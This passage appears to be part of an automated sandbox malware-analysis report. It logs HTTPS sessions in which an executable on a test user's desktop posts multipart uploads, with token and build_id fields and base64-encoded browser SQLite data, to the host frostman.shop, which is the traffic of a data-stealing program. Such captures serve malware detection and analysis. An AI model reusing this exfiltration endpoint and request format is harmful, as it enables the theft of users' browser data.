                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:34 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:36 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              16192.168.2.749785116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----YUAI5X4W47GV3EUS0HDT
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 493
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:35 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 59 55 41 49 35 58 34 57 34 37 47 56 33 45 55 53 30 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------YUAI5X4W47GV3EUS0HDTContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------YUAI5X4W47GV3EUS0HDTCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:36 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              17192.168.2.749815116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:41 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----O8GDBAS0ZU37YUAS0ZM7
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 3165
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:41 UTC3165OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 47 44 42 41 53 30 5a 55 33 37 59 55 41 53 30 5a 4d 37 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------O8GDBAS0ZU37YUAS0ZM7Content-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------O8GDBAS0ZU37YUAS0ZM7Cont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:42 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              18192.168.2.749827116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DTJEUS2DTRQQIMOZMYMO
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 207993
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 45 55 53 32 44 54 52 51 51 49 4d 4f 5a 4d 59 4d 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------DTJEUS2DTRQQIMOZMYMOContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------DTJEUS2DTRQQIMOZMYMOCont
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                              Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                              2024-12-20 06:31:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:31:44 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              19192.168.2.749829162.159.61.34431552C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:31:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                              Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                              Content-Length: 128
                                                                                                                                                                                                                                                                              Accept: application/dns-message
                                                                                                                                                                                                                                                                              Accept-Language: *
                                                                                                                                                                                                                                                                              User-Agent: Chrome
                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                              Content-Type: application/dns-message
